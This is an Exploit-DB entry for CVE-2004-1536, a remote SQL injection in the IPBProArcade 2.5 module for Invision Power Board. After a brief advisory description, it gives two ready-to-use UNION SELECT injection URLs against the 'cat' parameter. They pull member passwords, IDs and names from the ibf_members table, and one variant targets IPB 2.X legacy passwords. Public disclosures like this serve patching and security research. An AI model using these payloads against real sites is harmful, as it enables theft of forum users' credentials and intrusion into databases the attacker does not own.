IPBProArcade 2.5 - Remote SQL Injection Vulnerability

2004-11-20T00:00:00
ID EDB-ID:24759
Type exploitdb
Reporter axl daivy
Modified 2004-11-20T00:00:00

Description

IPBProArcade 2.5 Remote SQL Injection Vulnerability. CVE-2004-1536. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/11719/info

A remote SQL injection vulnerability reportedly affects ipbProArcade. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in an SQL query.

An attacker may leverage this issue to manipulate SQL query strings and potentially carry out arbitrary database queries. This may facilitate the disclosure or corruption of sensitive database information.

http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

For modules installed on Invision Power Board versions 2.X:
index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*